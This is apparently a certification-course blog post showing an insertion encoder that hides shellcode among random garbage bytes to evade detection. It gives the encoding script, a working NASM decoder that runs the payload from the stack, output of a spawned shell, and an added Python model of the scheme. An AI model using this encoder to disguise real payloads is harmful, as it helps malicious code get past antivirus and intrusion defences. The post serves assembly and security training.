October 03, 2013

Insertion Encoder with permutations

Hello everyone,

Today I'm publishing the Insertion Encoder, which encodes the shellcode by inserting randomly chosen garbage opcodes into it.

The idea is to add some garbage opcodes to the payload shellcode so that the payload is harder to detect. Below you can find the decoder, which skips the garbage opcodes and executes the original payload.

You can get the code here -> SLAE Assignment #4

Compiling and running the shellcode

exam4$ ./make.sh
[+] Compiling the payload and decoder ...
[+] Preparing decoder shellcode ...
[+] Encoding the payload shellcode ...
[+] Generating shellcode.c file ...
[+] Compiling shellcode.c with GCC ...
-rwx------. 1 arno arno 4980 Apr 11 14:14 ./shellcode

exam4$ ./shellcode
Shellcode Length:  114
sh-4.1$ exit
exit

Random opcode arrangement proof

[image: slae-exam4-shellcode-permutations]

The permutation code can be seen in the make.sh script:

[--- trimmed ---]
# Permutation code: after every payload byte, append one of the four garbage
# bytes chosen at random, then terminate the encoded payload with the exit marker 0xAF
garbage=('\x37' '\xFA' '\xD6' '\x3F');
#ENCPSHELLCODE=$(for i in $(objdump -d $SPAYLOAD |grep "^ " |cut -f2); do echo -n '\x'$i;  echo -n ${garbage[$[$(shuf --random-source=/dev/urandom -z -i 999-999999 -n1)%4]]}; done; echo -n "\xAF\"")
ENCPSHELLCODE=$(for i in $(objdump -d "$SPAYLOAD" | grep "^ " | cut -f2); do echo -n '\x'"$i"; echo -n "${garbage[$(( $(od -A n -N 2 -t u2 /dev/urandom) % 4 ))]}"; done; echo -n "\xAF\"")
[--- trimmed ---]

decoder.nasm

; This is a snippet of the original file https://github.com/arno01/SLAE/blob/master/exam4/decoder.nasm
section .text
global _start
_start:
jmp short _down ; JMP-CALL-POP technique
_up:
pop esi ; ESI = the return address pushed by "call _up", i.e. the first byte of the encoded shellcode appended after the decoder
xor ecx, ecx ; zero the counter of decoded bytes written so far
_decoder:
mov al, byte [esi] ; load the current byte of the encoded shellcode
inc esi ; advance to the next byte
;
; Checking for markers
; (any payload byte equal to one of these values would be skipped as well,
; so the markers must not occur in the original payload)
;
cmp al, 0x37
je short _decoder ; garbage byte: skip it and look at the next one
cmp al, 0xFA
je short _decoder ; garbage byte: skip it
cmp al, 0xD6
je short _decoder ; garbage byte: skip it
cmp al, 0x3F
je short _decoder ; garbage byte: skip it
cmp al, 0xAF
je short _runshellcode ; exit marker: the whole payload has been collected, run it
;
; Collecting the decoded shellcode at the address in ESP
;
mov byte [esp+ecx], al ; store the good byte on the stack at ESP + counter
inc ecx ; one more decoded byte
jmp short _decoder ; continue with the next byte
_runshellcode:
call esp ; jump into the decoded payload on the stack (the stack must be executable for this to work)
_down:
call _up ; pushes the address of the "next instruction", which is really the encoded shellcode placed here, then jumps back up
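To see the whole scheme end to end, here is an added Python model (not code from the original post or the SLAE repository) of the make.sh encoder and the decoder.nasm loop above. It uses the same four garbage bytes and the 0xAF exit marker, and adds the check the decoder silently relies on: a payload byte that equals a marker would be skipped or treated as the terminator, so the encoder refuses such payloads. The payload bytes and the rng parameter are constructed for the example.

```python
import secrets

# Garbage markers and exit marker used by make.sh and decoder.nasm on this page.
GARBAGE = bytes([0x37, 0xFA, 0xD6, 0x3F])
EXIT_MARKER = 0xAF


def check_payload(payload: bytes) -> list:
    """Return offsets of payload bytes that collide with a marker.

    The decoder skips any byte equal to a garbage marker and stops at the
    exit marker, so such a byte would corrupt or truncate the decoded payload.
    """
    bad = set(GARBAGE) | {EXIT_MARKER}
    return [i for i, b in enumerate(payload) if b in bad]


def encode(payload: bytes, rng=secrets.randbelow) -> bytes:
    """Mirror make.sh: one random garbage byte after every payload byte,
    then the exit marker. rng(n) must return an int in [0, n)."""
    if check_payload(payload):
        raise ValueError("payload contains marker bytes; pick other markers")
    out = bytearray()
    for b in payload:
        out.append(b)
        out.append(GARBAGE[rng(len(GARBAGE))])
    out.append(EXIT_MARKER)
    return bytes(out)


def decode(encoded: bytes) -> bytes:
    """Reference model of the decoder.nasm loop: skip garbage, stop at 0xAF."""
    out = bytearray()
    for b in encoded:
        if b == EXIT_MARKER:
            return bytes(out)
        if b not in GARBAGE:
            out.append(b)
    raise ValueError("exit marker not found; decoder would run off the end")


def as_c_string(data: bytes) -> str:
    """Format bytes the way make.sh writes them into shellcode.c."""
    return "".join(f"\\x{b:02X}" for b in data)


if __name__ == "__main__":
    # Constructed sample payload (no marker bytes in it), not real shellcode.
    payload = bytes.fromhex("31c050682f2f7368682f62696e89e3")
    enc = encode(payload)
    assert decode(enc) == payload
    print(len(payload), "->", len(enc), "bytes:", as_c_string(enc))
```

Every run of encode() produces a different byte arrangement, which is the "permutation" the screenshot above demonstrates, while decode() always recovers the same payload.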

That's all for now. Later I will make a polymorphic version of the shellcode.


This page has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-323